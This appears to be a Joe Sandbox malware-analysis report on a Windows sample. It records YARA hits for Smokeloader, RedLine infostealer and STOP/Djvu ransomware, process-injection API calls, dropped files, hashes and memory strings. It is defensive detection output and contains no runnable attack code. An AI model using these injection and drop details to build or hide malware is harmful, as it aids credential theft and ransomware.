Code function: 6_2_00402830 Concurrency::cancel_current_task,Concurrency::cancel_current_task,Concurrency::cancel_current_task,OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,

6_2_00402830

Source: C:\Users\user\AppData\Local\Temp\C676.exe

6_2_00402830

Source: file.exe, 00000000.00000002.397065443.0000000000798000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

Spam, unwanted Advertisements and Ransom Demands

Yara detected Djvu Ransomware

Source: Yara match	File source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 43D0.exe PID: 1332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 43D0.exe PID: 3900, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.3.C4AA.exe.df30000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.3.C4AA.exe.df30000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.C4AA.exe.12a0ed0.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.3.C4AA.exe.df30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.C4AA.exe.12a0ed0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.478433039.00000000048E8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.397101149.00000000007A9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.397013971.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000002.574270691.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.573778926.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 43D0.exe PID: 1332, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 43D0.exe PID: 3900, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040DCE1	0_2_0040DCE1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C2AD	0_2_0040C2AD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040BD69	0_2_0040BD69
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C7F1	0_2_0040C7F1
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_004041D0	6_2_004041D0
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_00411470	6_2_00411470
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_004010E0	6_2_004010E0
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_00406150	6_2_00406150
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_004021D0	6_2_004021D0
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_0042429D	6_2_0042429D
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_0042C5FE	6_2_0042C5FE
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_0040D600	6_2_0040D600
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_004266B9	6_2_004266B9
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_00402830	6_2_00402830
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_0040C9A0	6_2_0040C9A0
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_00419A6E	6_2_00419A6E
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_0041CAF0	6_2_0041CAF0
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_00409B10	6_2_00409B10
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_0042AB9A	6_2_0042AB9A
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_0040CC40	6_2_0040CC40
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_00401D90	6_2_00401D90
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_0040CE90	6_2_0040CE90
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_00421F48	6_2_00421F48
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_0040DCE1	7_2_0040DCE1
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_0040BD69	7_2_0040BD69
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_0040CEE9	7_2_0040CEE9
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_0040C2AD	7_2_0040C2AD
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_00404BDB	7_2_00404BDB
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_0040C7F1	7_2_0040C7F1
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_00406793	7_2_00406793

Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.globalization.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: capabilityaccessmanagerclient.dll	Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\43D0.exe F55976607594D241004245F084ADD64F399F7D4683C603F56EF92C0CBCD41E05

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9.3.C4AA.exe.df30000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.3.C4AA.exe.df30000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.C4AA.exe.12a0ed0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.3.C4AA.exe.df30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.C4AA.exe.12a0ed0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.478433039.00000000048E8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.397101149.00000000007A9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.397013971.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000002.574270691.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.573778926.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 43D0.exe PID: 1332, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 43D0.exe PID: 3900, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23

Source: C:\Users\user\AppData\Local\Temp\C676.exe

Code function: String function: 00413FF0 appears 54 times

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401558
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401749 NtMapViewOfSection,NtMapViewOfSection,	0_2_00401749
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401564
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401577
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401523
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401585
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040158C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040159A

Source: C4AA.exe.3.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\beirutt

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@17/6@3/3

Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/AppExplorer.AssocActionId.BurnSelectionExplorer.AssocActionId.CloseSessionIehistoryIerssJavascriptJscriptLDAPResrloginStickyNotesExplorer.AssocActionId.EraseDiscExplorer.AssocActionId.ZipSelectionExplorer.AssocProtocol.search-msExplorer.BurnSelectionExplorer.CloseSessionExplorer.EraseDiscExplorer.ZipSelectionFile.adp.app.application.appref-ms.asp.bas.cnt.cpftelnettn3270VbscriptwindowsmediacenterappwindowsmediacentersslwindowsmediacenterwebWMP11.AssocProtocol.MMS.ade.hlp.hme.hpj.hta.ins.isp.its.jse.cpl.crd.crds.crt.csh.fxp.gadget.grp.mat.mau.mav.maw.mcf.mda.mde.mdt.ksh.mad.maf.mag.mam.maq.mar.mas.mshxml.mst.ops.pcd.pl.plg.prf.prg.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.pvw.plsc.rb.rbw.rdp.rgu.scf.scr.printerexport.provxml.ps2.ps2xml.psc2.py.pyc.pyo.vsw.webpnp.ws.wsc.wsh.xaml.xdp.xip.shb.shs.theme.tsk.vb.vbe.vbp.vsmacros.xnkBRITNLSVDAFIHUNOENDEJAKOTWCNFRHEEUISsr-Latn-CSsr-SP-Latnsr-Cyrl-CSsr-SP-Cyrlsr-Latn-BAELPLRUCSPTSKSLARbs-BA-Latnzh-Hantzh-CHTzh-Hanszh-CHSsr-BA-Latnsr-Cyrl-BAsr-BA-Cyrliu-Latn-CAiu-CA-Latnbs-Cyrl-BAbs-BA-Cyrlbs-Latn-BAdadeelenesfifrhearbgcarmroruhrsksqsvthhuisitjakonlplptfavihyazeuhsbmksttrurukbeetlvlttghimtsegayimskkkytstnvexhzuafkafotateknmlasmrsamnswtkuzttbnpaguorsdsyrsichriuamtzmksbocykmlomyglkokmniibbyoquznsobalbklignefypsfildvbinffhapaparnmohbrugmioccokromtignhawlasoiiar-SAbg-BGca-ESzh-TWcs-CZda-DKde-DEel-GRgswsahqucrwwoprsgdkuja-JPko-KRnl-NLnb-NOpl-PLpt-BRrm-CHro-ROen-USes-ES_tradnlfi-FIfr-FRhe-ILhu-HUis-ISit-ITid-IDuk-UAbe-BYsl-SIet-EElv-LVlt-LTtg-Cyrl-TJru-RUhr-HRsk-SKsq-ALsv-SEth-THtr-TRur-PKts-ZAtn-ZAve-ZAxh-ZAzu-ZAaf-ZAka-GEfo-FOfa-IRvi-VNhy-AMaz-Latn-AZeu-EShsb-DEmk-MKst-ZAtk-TMuz-Latn-UZtt-RUbn-INpa-INgu-INor-INta-INhi-INmt-MTse-NOyi-001ms-MYkk-KZky-KGsw-KEcy-GBkm-KHlo-LAmy-MMgl-ESkok-INmni-INsd-Deva-INte-INkn-INml-INas-INmr-INsa-INmn-MNbo-CNfy-NLps-AFfil-PHdv-MVbin-NGff-NGha-Latn-NGibb-NGsyr-SYsi-LKchr-Cher-USiu-Cans-CAam-ETtzm-Arab-MAks-Arabne-NPom-ETti-ETgn-PYhaw-USla-001so-SOii-CNpap-029yo-NGquz-BOnso-ZAba-RUlb-LUkl-GLig-NGkr-NGsah-RUquc-Latn-GTrw-RWwo-SNprs-AFgd-GBku-Arab-IQqps-plocarn-CLmoh-CAbr-FRug-CNmi-NZoc-FRco-FRgsw-FRit-CHnl-BEnn-NOpt-PTro-MDru-MDsv-FIur-INqps-plocaar-IQca-ES-valenciazh-CNde-CHen-GBes-MXfr-BEpa-Arab-PKta-LKmn-Mong-CNsd-Arab-PKtzm-Latn-DZks-Deva-INne-INff-Latn-SNaz-Cyrl-AZdsb-DEtn-BWse-SEga-IEms-BNuz-Cyrl-UZbn-BDes-ESfr-CAse-FImn-Mong-MNdz-BTquz-PEar-LYzh-SGquz-ECti-ERqps-Latn-x-shqps-plocmar-EGzh-HKde-ATen-AUzh-MOde-LIen-NZes-CRfr-LUsmj-SEar-MAen-IEde-LUen-CAes-GTfr-CHhr-BAsmj-NOtzm-Tfng-MAar-DZar-OMen-JMes-VEfr-REsms-FIar-YEen-029es-COes-PAfr-MCsma-NOar-TNen-ZAes-DOfr-029sma-SEar-JOen-TTes-ARfr-CMsr-Latn-MEar-LBen-ZWes-ECfr-CDsr-Latn-RSsmn-FIar-SYen-BZes-PEfr-SNsr-Cyrl-RSes-UYfr-MAar-BHen-HKes-PYfr-HTar-QAen-INfr-CIsr-Cyrl-MEar-KWen-PHes-CLfr-MLar-AEen-IDes-419es-CUbs-Cyrlbs-Latnsr-Cyrlsr-Latnsmnaz-Cyrles-BOen-MYes-SVen-SGes-HNes-NIes-PRes-USiu-Canstzm-Tfngnb